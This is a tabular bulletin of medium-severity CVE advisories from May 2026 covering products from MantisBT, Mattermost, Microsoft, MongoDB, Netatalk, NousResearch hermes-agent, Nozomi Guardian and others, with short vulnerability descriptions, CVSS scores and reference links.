| mantisbt–mantisbt | Mantis Bug Tracker (MantisBT) is an open source issue tracker. Versions 2.28.1 and below contain flawed logic that causes improper escaping of a textarea custom field’s contents in the Update Issue page, (bug_update_page.php) allowing an attacker to inject HTML and, if CSP settings permit, execute arbitrary JavaScript when the page is loaded. This facilitates session theft, leading to admin account takeover, full project data access. In order to exploit this issue, a textarea-type custom field must be configured for the project, the attack must be carried out by an authenticated user with bug report permission (low privilege). This can affect any user viewing the bug edit form, including administrators. The issue has been fixed in version 2.28.2. If users cannot immediately upgrade, they can work around the issue by using the default Content-Security Policy, which blocks script execution. | 2026-05-20 | 5.4 | CVE-2026-39960 | https://github.com/mantisbt/mantisbt/security/advisories/GHSA-qj6w-v29q-4rgx https://github.com/mantisbt/mantisbt/commit/5fec0f448b7a7d7d539a6adb6dccceac4e4e4ab7 |
| mantisbt–mantisbt | Mantis Bug Tracker (MantisBT) is an open source issue tracker. Versions 2.28.1 and prior allow an authenticated user to upload attachments to private Issues they are not authorized to access. This issue has been fixed in version 2.28.2. | 2026-05-19 | 4.3 | CVE-2026-34754 | https://github.com/mantisbt/mantisbt/security/advisories/GHSA-h4x5-gvx6-3rwc https://github.com/mantisbt/mantisbt/commit/b262b4d2835b81394d75356dead66e52a6275206 https://mantisbt.org/bugs/view.php?id=36976 |
| Mattermost–Mattermost | Mattermost Mobile Apps versions <=2.37 11.4 2.0.37 11.0.4 11.1.3 11.3.2 10.11.11.0 fail to properly validate the SSO authentication callback origin which allows an attacker controlling a malicious Mattermost server to steal user credentials for a legitimate Mattermost server via relaying the SSO code exchange flow through the mobile application. Mattermost Advisory ID: MMSA-2025-00564 | 2026-05-21 | 6.1 | CVE-2026-22880 | MMSA-2025-00564 |
| Mattermost–Mattermost | Mattermost Plugins versions <=11.5 11.1.5 10.13.11 11.3.4.0 fail to properly check for permissions when processing commands in the Gitlab plugin which allows normal users to uninstall instances or setup webhook connections via the {{gitlab instance {option}}} or the {{/gitlab webhook {option}}} commands. Mattermost Advisory ID: MMSA-2026-00600 | 2026-05-18 | 6.5 | CVE-2026-3117 | MMSA-2026-00600 |
| Mattermost–Mattermost | Mattermost Desktop App versions <=6.1 6.0.1 5.4.13.0 fail to prevent an invalid URL from loading in a pop-up window in the Mattermost Desktop App which allows a malicious server owner to repeated crash the application via calling {{window.open(‘javascript:alert()’);}}. Mattermost Advisory ID: MMSA-2026-00618 | 2026-05-18 | 6.5 | CVE-2026-3471 | MMSA-2026-00618 |
| Mattermost–Mattermost | Mattermost versions 11.6.x <= 11.6.0, 11.5.x <= 11.5.3, 11.4.x <= 11.4.4, 10.11.x <= 10.11.14 fail to archive the channel before removing persistent notifications which allows authenticated user to crash the server via timing the creation of persistent notification message between the server deleting existing persistent notifications and archiving the channel.. Mattermost Advisory ID: MMSA-2026-00637 | 2026-05-22 | 6.5 | CVE-2026-4635 | MMSA-2026-00637 |
| Mattermost–Mattermost | Mattermost versions 11.5.x <= 11.5.1 fail to verify channel membership when processing AI-assisted message rewrites which allows an authenticated attacker to read the content of threads in private channels and direct messages they do not have access to via a crafted request to the post rewrite endpoint.. Mattermost Advisory ID: MMSA-2026-00645 | 2026-05-18 | 6.5 | CVE-2026-5163 | MMSA-2026-00645 |
| Mattermost–Mattermost | Mattermost versions 11.6.x <= 11.6.0, 11.5.x <= 11.5.2, 11.5.x <= 11.5.3, 11.4.x <= 11.4.4, 10.11.x <= 10.11.14 fail to validate the TIFF IFD offset in the image header before allocating memory, which allows authenticated users with file upload or posting permissions to cause a denial of service (server OOM) via uploading a crafted TIFF file or posting a URL that serves one.. Mattermost Advisory ID: MMSA-2026-00648 | 2026-05-22 | 6.5 | CVE-2026-5755 | MMSA-2026-00648 |
| Mattermost–Mattermost | Mattermost versions 11.5.x <= 11.5.1, 10.11.x <= 10.11.13, 11.4.x <= 11.4.3 fail prevent disclosure of created user password which allows a malicious attacker to impersonate a user via the use of some of those passwords.. Mattermost Advisory ID: MMSA-2026-00614 | 2026-05-18 | 6.5 | CVE-2026-6345 | MMSA-2026-00614 |
| Mattermost–Mattermost | Mattermost versions 11.6.x <= 11.6.0, 11.5.x <= 11.5.3, 11.4.x <= 11.4.4, 10.11.x <= 10.11.14 fail to validate the OAuth token scope on the callback which allows an authenticated Mattermost user to gain access to private repositories via modifying the scope parameter in the GitHub authorization URL.. Mattermost Advisory ID: MMSA-2026-00628 | 2026-05-22 | 5.4 | CVE-2026-28735 | MMSA-2026-00628 |
| Mattermost–Mattermost | Mattermost versions 11.6.x <= 11.6.0, 11.5.x <= 11.5.3, 11.4.x <= 11.4.4, 10.11.x <= 10.11.14 fail to validate file ownership and access control, which allows an authenticated user to access and download files belonging to other users or teams via crafted Boards API requests using valid file IDs.. Mattermost Advisory ID: MMSA-2026-00620 | 2026-05-22 | 5.9 | CVE-2026-3473 | MMSA-2026-00620 |
| Mattermost–Mattermost | Mattermost versions 11.5.x <= 11.5.1, 10.11.x <= 10.11.13, 11.4.x <= 11.4.3 fail to limit the size of the request body on the start meeting API endpoint, which allows an authenticated attacker to cause resource exhaustion or denial of service via a crafted oversized HTTP POST request to {{/api/v1/meetings}}.. Mattermost Advisory ID: MMSA-2026-00608 | 2026-05-18 | 4.3 | CVE-2026-2325 | MMSA-2026-00608 |
| Mattermost–Mattermost | Mattermost versions 11.5.x <= 11.5.1, 10.11.x <= 10.11.13, 11.4.x <= 11.4.3 Fail to enforce slash command trigger-word uniqueness during command updates which allows an authenticated team member with Manage Own Slash Commands permission to hijack and impersonate existing system or custom slash commands via editing their own slash command trigger to an already-registered trigger through the command update API. Mattermost Advisory ID: MMSA-2026-00597 | 2026-05-18 | 4.3 | CVE-2026-28732 | MMSA-2026-00597 |
| Mattermost–Mattermost | Mattermost versions 11.5.x <= 11.5.1, 10.11.x <= 10.11.13, 11.4.x <= 11.4.3 fail to validate that a remote cluster has access to a channel before processing membership removal requests during shared channel membership sync, which allows a malicious remote cluster to remove any user from any channel, including private channels, via crafted membership sync messages targeting channels the remote cluster is not authorized to access. Mattermost Advisory ID: MMSA-2026-00576 | 2026-05-18 | 4.3 | CVE-2026-28759 | MMSA-2026-00576 |
| Mattermost–Mattermost | Mattermost versions 11.6.x <= 11.6.0, 11.5.x <= 11.5.3, 11.4.x <= 11.4.4, 10.11.x <= 10.11.14 fail to sanitize team member data when returned via API to users without elevated permissions which allows a user without permissions to get data about team members roles via invoking various team API endpoints.. Mattermost Advisory ID: MMSA-2026-00626 | 2026-05-22 | 4.3 | CVE-2026-3636 | MMSA-2026-00626 |
| Mattermost–Mattermost | Mattermost versions 11.5.x <= 11.5.1, 10.11.x <= 10.11.13, 11.4.x <= 11.4.3 fail to check the create_post channel permission during post edit operations which allows an authenticated attacker with revoked posting privileges to modify their existing posts via direct API requests to the post update and patch endpoints.. Mattermost Advisory ID: MMSA-2026-00627 | 2026-05-18 | 4.3 | CVE-2026-3637 | MMSA-2026-00627 |
| Mattermost–Mattermost | Mattermost versions 11.5.x <= 11.5.1 fail to validate team-level run_create permission against the target team when creating a playbook run which allows an authenticated team member to create runs in teams where they lack permission via specifying a different team ID in the run creation API request. Mattermost Advisory ID: MMSA-2026-00629 | 2026-05-21 | 4.3 | CVE-2026-4055 | MMSA-2026-00629 |
| Mattermost–Mattermost | Mattermost versions 11.6.x <= 11.6.0, 11.5.x <= 11.5.3, 11.4.x <= 11.4.4, 10.11.x <= 10.11.14 fail to validate user-supplied input in API request handlers which allows an authenticated attacker to crash the plugin process via a crafted HTTP request to the PR details endpoint.. Mattermost Advisory ID: MMSA-2026-00638 | 2026-05-22 | 4.3 | CVE-2026-4646 | MMSA-2026-00638 |
| Mattermost–Mattermost | Mattermost versions 11.6.x <= 11.6.0, 11.5.x <= 11.5.3, 11.4.x <= 11.4.4, 10.11.x <= 10.11.14 fail to enforce request body size limits on plugin HTTP endpoints which allows an attacker to cause a denial of service via crafted oversized HTTP requests.. Mattermost Advisory ID: MMSA-2026-00646 | 2026-05-22 | 4.9 | CVE-2026-5308 | MMSA-2026-00646 |
| Mattermost–Mattermost | Mattermost versions 11.5.x <= 11.5.1, 11.4.x <= 11.4.3 fail to validate the X-Requested-With header on the burn-on-read reveal endpoint which allows an authenticated channel member to force the reveal of a burn-on-read message without recipient consent via a crafted Markdown image tag.. Mattermost Advisory ID: MMSA-2026-00636 | 2026-05-18 | 4.3 | CVE-2026-6339 | MMSA-2026-00636 |
| Mattermost–Mattermost | Mattermost versions 11.5.x <= 11.5.1, 10.11.x <= 10.11.13, 11.4.x <= 11.4.3 fail to validate 7zip archive structure before processing which allows an authenticated attacker to cause server memory exhaustion and denial of service via uploading a specially crafted 7zip file with excessive folder declarations.. Mattermost Advisory ID: MMSA-2026-00573 | 2026-05-18 | 4.3 | CVE-2026-6340 | MMSA-2026-00573 |
| Mattermost–Mattermost | Mattermost Plugins versions <=11.5 11.1.5 10.13.11 11.3.4.0 fail to have API-level checks on which groups the user can create issues or attach comments to which allows a user that is member of multiple groups to create issues to a locked group via direct API requests. Mattermost Advisory ID: MMSA-2026-00602 | 2026-05-18 | 4.3 | CVE-2026-6341 | MMSA-2026-00602 |
| Mattermost–Mattermost | Mattermost Plugins versions <=11.5 11.1.5 10.13.11 11.3.4.0 fail to appropriately check for valid namespaces which allows plugin users to create subscriptions to groups that were not whitelisted via creating groups that share the same prefix as a whitelisted group. Mattermost Advisory ID: MMSA-2026-00601 | 2026-05-18 | 4.3 | CVE-2026-6342 | MMSA-2026-00601 |
| Mattermost–Mattermost | Mattermost versions 11.5.x <= 11.5.1, 10.11.x <= 10.11.13, 11.4.x <= 11.4.3 fail to check public/private permissions which allows members without these permissions to access public playbooks via /get.. Mattermost Advisory ID: MMSA-2026-00591 | 2026-05-18 | 4.3 | CVE-2026-6343 | MMSA-2026-00591 |
| mcinvale–Faces of Users | The Faces of Users plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘default’ shortcode attribute in the ‘facesofusers’ shortcode in all versions up to, and including, 0.0.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-20 | 6.4 | CVE-2026-8038 | https://www.wordfence.com/threat-intel/vulnerabilities/id/ea39d249-0345-4028-af58-31b298376950?source=cve https://plugins.trac.wordpress.org/browser/faces-of-users/trunk/faces-of.php#L62 https://plugins.trac.wordpress.org/browser/faces-of-users/tags/0.0.3/faces-of.php#L62 |
| Mesalvo–Meona Client Launcher Component | Cleartext Storage of Sensitive Information in Memory vulnerability in Mesalvo Meona Client Launcher Component, Mesalvo Meona Server Component. This issue affects Meona Client Launcher Component: through 19.06.2020 15:11:49; Meona Server Component: through 2025.04 5+323020. | 2026-05-20 | 6 | CVE-2026-0857 | https://seccore.at/blog/cves-meona/ |
| Mesalvo–Meona Client Launcher Component | Insufficient Verification of Data Authenticity vulnerability in Mesalvo Meona Client Launcher Component, Mesalvo Meona Server Component makes it possible to send messages to any email address. This issue affects Meona Client Launcher Component: through 19.06.2020 15:11:49; Meona Server Component: through 2025.04 5+323020. | 2026-05-20 | 4.4 | CVE-2026-25602 | https://seccore.at/blog/cves-meona/ |
| Microsoft–Microsoft 365 Copilot | Improper neutralization of special elements used in a command (‘command injection’) in M365 Copilot allows an unauthorized attacker to disclose information over a network. | 2026-05-22 | 6.5 | CVE-2026-42827 | M365 Copilot Information Disclosure Vulnerability |
| Microsoft–Microsoft Defender Antimalware Platform | Microsoft Defender Denial of Service Vulnerability | 2026-05-20 | 4 | CVE-2026-45498 | Microsoft Defender Denial of Service Vulnerability |
| Microsoft–Microsoft Edge (Chromium-based) | Improper input validation in Microsoft Edge (Chromium-based) allows an unauthorized attacker to bypass a security feature over a network. | 2026-05-18 | 5.4 | CVE-2026-45492 | Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability |
| Microsoft–Microsoft Edge (Chromium-based) | Microsoft Edge (Chromium-based) Spoofing Vulnerability | 2026-05-18 | 5.4 | CVE-2026-45494 | Microsoft Edge (Chromium-based) Spoofing Vulnerability |
| Microsoft–Windows 11 Version 24H2 | Microsoft is aware of a security feature bypass vulnerability in Windows publicly referred to as "YellowKey". The proof of concept for this vulnerability has been made public violating coordinated vulnerability best practices. We are issuing this CVE to provide mitigation guidance that can be implemented to protect against this vulnerability until the security update is made available. Mitigation FAQs Should I leverage the temporary mitigation? Microsoft recommends that you consider implementing these mitigations if you are concerned your devices and data are at risk of being compromised or stolen. For example, if your organization’s employees take their work devices home or on business travel. What impact to service availability/management could be caused by implementing the mitigations? Implementing these mitigations will not impact service availability or management operations. Do customers need to revert the changes made to mitigate the vulnerability once the security update to protect against this vulnerability is available? No. The security update will maintain the mitigation’s behavior once the security update is installed. I am using TPM+PIN, am I at risk of this vulnerability being exploited No, if you are using TPM+PIN the vulnerability is not exploitable. | 2026-05-19 | 6.8 | CVE-2026-45585 | Windows BitLocker Security Feature Bypass Vulnerability |
| MongoDB, Inc.–C Driver | The MongoDB C Driver’s legacy GridFS API accepts malformed file metadata from the database without adequate validation. Crafted documents in a GridFS collection may cause any application that reads those files via the legacy API to either crash (via a division-by-zero) or silently leak process memory contents (via an out-of-bounds read). | 2026-05-20 | 5.9 | CVE-2026-9100 | https://jira.mongodb.org/browse/CDRIVER-6281 |
| MongoDB, Inc.–Compass | Prototype pollution in csv parsing logic during import can lead to untrusted file paths (but not arguments) entering shell.openExternal after specific user behavior leading to “1-click” command execution. | 2026-05-20 | 4.3 | CVE-2026-9101 | https://jira.mongodb.org/browse/COMPASS-10657 |
| MongoDB, Inc.–MongoDB Server | Creating a “2dsphere_bucket” index on a non-timeseries bucket collection will succeed, but any subsequent attempt to insert a document which triggers updating that index will crash the server. A similar issue occurs when creating “queryable_encrypted_range” indices. This issue affects MongoDB Server v7.0 versions prior to 7.0.32, v8.0 versions prior to 8.0.21 and v8.2 versions prior to 8.2.6 | 2026-05-18 | 6.5 | CVE-2026-8843 | https://jira.mongodb.org/browse/SERVER-116327 |
| mrdollar4444–GSheet For Woo Importer | The GSheet For Woo Importer plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the process_ajax_restore_action() function in all versions up to, and including, 2.3.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete the plugin’s Google Sheets API token and configuration options. | 2026-05-21 | 4.3 | CVE-2026-4843 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b0d60991-0675-4efa-9427-380e6b59fe28?source=cve https://plugins.trac.wordpress.org/browser/import-products-from-gsheet-for-woo-importer/tags/2.3.1/src/Actions/AdminSettingsAction.php#L391 |
| n/a–Ettercap | A vulnerability has been found in Ettercap up to 0.8.3. The affected element is the function FUNC_DECODER of the file src/dissectors/ec_gg.c of the component GG Dissector. The manipulation of the argument gg leads to heap-based buffer overflow. The attack is possible to be carried out remotely. The complexity of an attack is rather high. The exploitability is described as difficult. The exploit has been disclosed to the public and may be used. Upgrading to version 0.8.4 is sufficient to fix this issue. The identifier of the patch is feeae6fa366e01a3dd9f1857ec6aae847b2ae00c. It is suggested to upgrade the affected component. | 2026-05-24 | 5.6 | CVE-2026-9365 | VDB-365328 | Ettercap GG Dissector ec_gg.c FUNC_DECODER heap-based overflow VDB-365328 | CTI Indicators (IOB, IOC, IOA) Submit #813142 | Ettercap <=v0.8.4 Heap-based Buffer Overflow https://github.com/Ettercap/ettercap/issues/1306 https://github.com/Ettercap/ettercap/pull/1307 https://github.com/Ettercap/ettercap/commit/feeae6fa366e01a3dd9f1857ec6aae847b2ae00c https://github.com/Ettercap/ettercap/ |
| n/a–exifreader | Versions of the package exifreader before 4.39.0 are vulnerable to Improper Handling of Highly Compressed Data (Data Amplification) due to decompressing PNG zTXt metadata without enforcing a built-in maximum decompressed output size. When asynchronous parsing is enabled, a crafted PNG file containing a highly compressed zTXt chunk can cause ExifReader to materialize a disproportionately large Comment value in memory. | 2026-05-19 | 5.3 | CVE-2026-8814 | https://security.snyk.io/vuln/SNYK-JS-EXIFREADER-16689340 https://gist.github.com/yuki-matsuhashi/cad1a45d936062438b4ab24613c34c55 https://github.com/mattiasw/ExifReader/commit/5f116128adc19f674902f8bf582bfe7dd0a36375 |
| n/a–JPress | A vulnerability was determined in JPress up to 1.0.3. The affected element is an unknown function of the file /ucenter/article/doWriteSave of the component UCenter Article Submission Endpoint. Executing a manipulation of the argument id/userId can lead to improper authorization. The attack may be performed from remote. The exploit has been publicly disclosed and may be utilized. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-24 | 6.3 | CVE-2026-9376 | VDB-365339 | JPress UCenter Article Submission Endpoint doWriteSave improper authorization VDB-365339 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #813253 | JPress 1.0.3 Improper Authorization https://github.com/JPressProjects/jpress/issues/194 |
| n/a–postcss | A vulnerability was determined in postcss up to 7.1.1. Affected is the function toString of the file src/selectors/container.js of the component AST Serialization. Executing a manipulation can lead to uncontrolled recursion. It is possible to launch the attack remotely. The exploit has been publicly disclosed and may be utilized. The vendor explains, that according to his definition “DoS on server-side on user-generated CSS is low risk for us (since most users compile own CSS with PostCSS).” | 2026-05-24 | 4.3 | CVE-2026-9358 | VDB-365321 | postcss AST Serialization container.js toString recursion VDB-365321 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #813080 | postcss-selector-parser postcss <= 7.1.1 CWE-674: Uncontrolled Recursion https://gist.github.com/bx33661/581e3a38134601c04e19b4dfc9b459b9 |
| nanomq–nanomq | NanoMQ MQTT Broker (NanoMQ) is an all-around Edge Messaging Platform. In versions 0.24.10 and below, when NanoMQ handles high-concurrency reconnect traffic using a reconnect-collision payload, the broker can crash due to a NULL pointer dereference during MQTT session resumption for clean_start=0 clients. The transport’s p_peer callback (tcptran_pipe_peer()) iterates cpipe->subinfol while copying session metadata from the cached old pipe to the new reconnecting pipe, without checking whether the pointer is NULL. Under a reconnect race, cpipe->subinfol can be freed and set to NULL before session restore invokes this function, resulting in a remote unauthenticated Denial-of-Service (process crash) condition. This issue has been fixed in version 0.24.11. | 2026-05-19 | 5.9 | CVE-2026-32134 | https://github.com/nanomq/nanomq/security/advisories/GHSA-q36f-83mh-pcv2 https://github.com/nanomq/nanomq/issues/2241 https://github.com/nanomq/NanoNNG/commit/522ec62e29e60d1122f2aedaa6e702dcf089f7bb https://github.com/nanomq/nanomq/releases/tag/0.24.11 |
| NeoRazorX–facturascripts | FacturaScripts is an open source accounting and invoicing software. In versions prior to 2026, the Library module stores and serves uploaded images byte-for-byte, without stripping EXIF/XMP/IPTC metadata. Any authenticated user who downloaded an image could extract the uploader’s embedded metadata, which included GPS coordinates, device information, timestamps, embedded comments/notes, thumbnail previews, and other personally identifiable information (PII) preserved in the image metadata. Of all FacturaScripts’ image upload features, only the Library module combined unrestricted uploads, persistent storage, authenticated download access, and a total lack of server-side metadata sanitization. This vulnerability carries significant real-world impact: an employee uploading a photo taken at their home inadvertently discloses their precise home address to every user with Library download access. This issue has been fixed in version 2026. | 2026-05-18 | 6.5 | CVE-2026-27892 | https://github.com/NeoRazorX/facturascripts/security/advisories/GHSA-q7f2-rv22-2xgr https://github.com/NeoRazorX/facturascripts/commit/b0725147a61a9a377b7180589af33ff52b4751e2 |
| Netatalk–Netatalk | Netatalk 2.0.0 through 4.4.2 generates AFP session tokens derived from predictable process IDs, which allows a remote authenticated attacker to cause a denial of service by exploiting the reconnect mechanism. | 2026-05-21 | 6.5 | CVE-2026-44054 | Netatalk Security Advisory CVE-2026-44054 |
| Netatalk–Netatalk | A stack-based buffer overflow in desktop.c in Netatalk 1.3 through 4.2.2 allows a remote authenticated attacker to cause a denial of service, obtain limited information, or modify limited data. | 2026-05-21 | 6 | CVE-2026-44056 | Netatalk Security Advisory CVE-2026-44056 |
| Netatalk–Netatalk | An authentication bypass vulnerability in Netatalk 2.2.2 through 4.4.2 allows a remote privileged user to authenticate as an arbitrary user via the admin auth user mechanism. | 2026-05-21 | 6.4 | CVE-2026-44058 | Netatalk Security Advisory CVE-2026-44058 |
| Netatalk–Netatalk | Insufficient sanitization of volume paths in Netatalk 3.1.0 through 4.4.2 allows a local privileged user to inject OS commands and execute arbitrary code via a crafted volume path. | 2026-05-21 | 6.7 | CVE-2026-44076 | Netatalk Security Advisory CVE-2026-44076 |
| Netatalk–Netatalk | Netatalk 1.5.0 through 4.4.2 uses DES-ECB for authentication with a timing side channel, which allows a remote attacker to recover authentication credentials via timing analysis. | 2026-05-21 | 5.9 | CVE-2026-44061 | Netatalk Security Advisory CVE-2026-44061 |
| Netatalk–Netatalk | An LDAP injection vulnerability in Netatalk 2.1.0 through 4.4.2 allows a remote authenticated attacker to manipulate LDAP queries and obtain limited information or modify LDAP entries via crafted filter input. | 2026-05-21 | 4.2 | CVE-2026-44063 | Netatalk Security Advisory CVE-2026-44063 |
| Netatalk–Netatalk | Authentication modules in Netatalk 1.5.0 through 4.4.2 fail to check the return value of seteuid(), which may allow a remote authenticated attacker to retain elevated privileges under error conditions. | 2026-05-21 | 4 | CVE-2026-44073 | Netatalk Security Advisory CVE-2026-44073 |
| NetBSD–src | NetBSD prior to commit ec8451e contains a signed integer overflow vulnerability in the cryptodev_op() function in sys/opencrypto/cryptodev.c where the local variable iov_len is declared as a signed int but assigned from an unsigned cop->dst_len value, causing undefined behavior when cop->dst_len exceeds INT_MAX. A local attacker with access to /dev/crypto and a compression session type can exploit this vulnerability by providing a dst_len value exceeding INT_MAX to trigger a kernel panic through NULL pointer dereference when CONFIG_SVS is disabled and corrupted UIO pointer arithmetic. | 2026-05-18 | 5.5 | CVE-2026-32849 | https://nasm.re/posts/uaf_netbsd_crypto/ https://github.com/NetBSD/src/commit/ec8451efc1565516aba9e7047e1a1a1ce7953a2f https://www.vulncheck.com/advisories/netbsd-signed-integer-overflow-in-cryptodev-op-via-cryptodev-c |
| NetBSD–src | NetBSD prior to commit ec8451e contains a race condition vulnerability in cryptodev_op() within the opencrypto subsystem that allows local attackers to trigger a double-free condition by concurrently issuing CIOCCRYPT operations on the same session identifier on SMP systems. Attackers can exploit mutable per-operation state embedded in the csession struct to corrupt kernel heap memory. | 2026-05-18 | 4.7 | CVE-2026-32848 | https://nasm.re/posts/uaf_netbsd_crypto/ https://github.com/NetBSD/src/commit/ec8451efc1565516aba9e7047e1a1a1ce7953a2f https://www.vulncheck.com/advisories/netbsd-cryptodev-race-condition-double-free-via-cryptodev-op |
| nimiq–core-rs-albatross | nimiq-blockchain provides persistent block storage for Nimiq’s Rust implementation. In versions 1.3.0 and prior, network-libp2p discovery accepts signed PeerContact updates from untrusted peers and stores them in a peer contact book, eventually leading to address book crash. A PeerContact can legally contain an empty addresses list (no intrinsic validation enforces non-empty). Later, PeerContactBook::known_peers builds an address book by taking addresses.first().expect(“every peer should have at least one address”). If the attacker has inserted a signed peer contact with addresses=[], any call to get_address_book (RPC/web client) can panic and crash the node/RPC task depending on panic settings. This issue has been fixed in version 1.4.0. | 2026-05-20 | 4.3 | CVE-2026-40094 | https://github.com/nimiq/core-rs-albatross/security/advisories/GHSA-c45m-6×25-3cjq https://github.com/nimiq/core-rs-albatross/pull/3715 https://github.com/nimiq/core-rs-albatross/releases/tag/v1.4.0 |
| NousResearch–hermes-agent | A security flaw has been discovered in NousResearch hermes-agent up to 2026.4.16. This vulnerability affects the function _is_blocked_device of the file tools/file_tools.py of the component read_file Tool. Performing a manipulation results in path traversal. The attack may be initiated remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 6.5 | CVE-2026-9351 | VDB-365314 | NousResearch hermes-agent read_file Tool file_tools.py _is_blocked_device path traversal VDB-365314 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #812214 | NousResearch hermes-agent 2026.4.16 Path Traversal (CWE-22) https://gist.github.com/YLChen-007/1d1aeff404cb88e06ec2fb3377f49fef |
| NousResearch–hermes-agent | A vulnerability was detected in NousResearch hermes-agent up to 2026.4.16. The affected element is an unknown function of the component Slack Agent/Mattermost Agent. The manipulation of the argument format_message results in escaping of output. The attack can be executed remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 6.5 | CVE-2026-9354 | VDB-365317 | NousResearch hermes-agent Slack Agent/Mattermost Agent escape output VDB-365317 | CTI Indicators (IOB, IOC, IOA) Submit #812226 | NousResearch hermes-agent 2026.4.16 Improper Encoding or Escaping of Output (CWE-116) https://gist.github.com/YLChen-007/e90fb38ac03284176bae49898a3a46a4 |
| NousResearch–hermes-agent | A weakness has been identified in NousResearch hermes-agent up to 2026.4.23. This issue affects the function _make_run_env of the file tools/environments/local.py of the component Messaging Gateway Handler. Executing a manipulation can lead to information disclosure. The attack may be launched remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 5.3 | CVE-2026-9352 | VDB-365315 | NousResearch hermes-agent Messaging Gateway local.py _make_run_env information disclosure VDB-365315 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #812215 | NousResearch hermes-agent 2026.4.23 Exposure of Sensitive Information (CWE-200) https://gist.github.com/YLChen-007/760b3940f708990e535214529c0c7a27 |
| NousResearch–hermes-agent | A security flaw has been discovered in NousResearch hermes-agent 2026.4.23. Affected is the function _discover_dashboard_plugins of the file hermes_cli/web_server.py of the component CLI web-dashboard Interface. Performing a manipulation of the argument HERMES_ENABLE_PROJECT_PLUGINS results in incorrect comparison. The attack is only possible with local access. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 5.3 | CVE-2026-9369 | VDB-365332 | NousResearch hermes-agent CLI web-dashboard web_server.py _discover_dashboard_plugins comparison VDB-365332 | CTI Indicators (IOB, IOC, IOA) Submit #812230 | NousResearch hermes-agent 2026.4.23 Incorrect Comparison (CWE-697) https://gist.github.com/YLChen-007/062b77ceac6aa9844842a616f5d2ef30 |
| Nozomi Networks–Guardian | A Stored HTML Injection vulnerability was discovered in the Smart Polling functionality due to improper validation of an input parameter. An authenticated user with limited privileges can push malicious remote strategies containing HTML tags through the sync. When a victim views the affected remote strategy in the Smart Polling functionality, the injected HTML renders in their browser, enabling phishing and possibly open redirect attacks. Full XSS exploitation and direct information disclosure are prevented by the existing input validation and Content Security Policy configuration. | 2026-05-19 | 6.5 | CVE-2025-40904 | https://security.nozominetworks.com/NN-2026:7-01 |
| Nozomi Networks–Guardian | A Stored HTML Injection vulnerability was discovered in the Credentials Manager functionality due to improper validation of an input parameter. An authenticated user with administrative privileges can define a malicious identity containing HTML tags. When a victim attempts to delete the affected identity, the injected HTML renders in their browser, enabling phishing and possibly open redirect attacks. Full XSS exploitation and direct information disclosure are prevented by the existing input validation and Content Security Policy configuration. | 2026-05-19 | 5.9 | CVE-2025-40901 | https://security.nozominetworks.com/NN-2026:4-01 |
| Nozomi Networks–Guardian | A Stored HTML Injection vulnerability was discovered in the Users functionality due to improper validation of an input parameter. An authenticated user with administrative privileges can create a malicious user whose username contains HTML tags. When a victim attempts to delete a group containing the affected user, the injected HTML renders in their browser, enabling phishing and possibly open redirect attacks. Full XSS exploitation and direct information disclosure are prevented by the existing input validation and Content Security Policy configuration. | 2026-05-19 | 5.9 | CVE-2025-40902 | https://security.nozominetworks.com/NN-2026:5-01 |
| Nozomi Networks–Guardian | A Stored HTML Injection vulnerability was discovered in the Schedule Restore Archive functionality due to improper validation of an input parameter. An authenticated user with administrative privileges can define a malicious restore schedule containing HTML tags. When a victim views the affected schedule, the injected HTML renders in their browser, enabling phishing and possibly open redirect attacks. Full XSS exploitation and direct information disclosure are prevented by the existing input validation and Content Security Policy configuration. | 2026-05-19 | 5.9 | CVE-2025-40903 | https://security.nozominetworks.com/NN-2026:6-01 |
| Nozomi Networks–Guardian | An Angular template injection vulnerability was discovered in the Reports functionality due to improper validation of an input parameter. An authenticated user with report privileges can define a malicious report containing an Angular template payload, or a victim can be socially engineered to import a malicious report template. When the victim views or imports the report, the Angular template executes in their browser context, allowing the attacker to modify application data, or disrupt application availability. Full XSS exploitation and direct information disclosure are prevented by the existing input validation and Content Security Policy configuration. | 2026-05-19 | 4.6 | CVE-2025-40900 | https://security.nozominetworks.com/NN-2026:3-01 |
| npitre–cramfs-tools | A vulnerability was detected in npitre cramfs-tools up to 2.2. Affected is the function change_file_status of the file cramfsck.c. Performing a manipulation results in symlink following. The attack requires a local approach. The exploit is now public and may be used. The patch is named b4a3a695c9873f824907bd15659f2a6ac7667b4f. It is recommended to apply a patch to fix this issue. | 2026-05-18 | 4.2 | CVE-2026-8784 | VDB-364408 | npitre cramfs-tools cramfsck.c change_file_status symlink VDB-364408 | CTI Indicators (IOB, IOC, IOA) Submit #811897 | GNU cramfs-tools below v2.2 Symlink Following https://github.com/npitre/cramfs-tools/issues/13 https://github.com/npitre/cramfs-tools/issues/13#issuecomment-4306102583 https://github.com/npitre/cramfs-tools/commit/b4a3a695c9873f824907bd15659f2a6ac7667b4f https://github.com/npitre/cramfs-tools/ |
| NVIDIA–TensorRT-LLM | NVIDIA TRT-LLM for any platform contains a deserialization vulnerability and unsafe serialized handle. A successful exploit of this vulnerability might lead to code execution, data tampering, and information disclosure. | 2026-05-20 | 6.3 | CVE-2026-24142 | https://nvd.nist.gov/vuln/detail/CVE-2026-24142 https://www.cve.org/CVERecord?id=CVE-2026-24142 https://nvidia.custhelp.com/app/answers/detail/a_id/5805 |
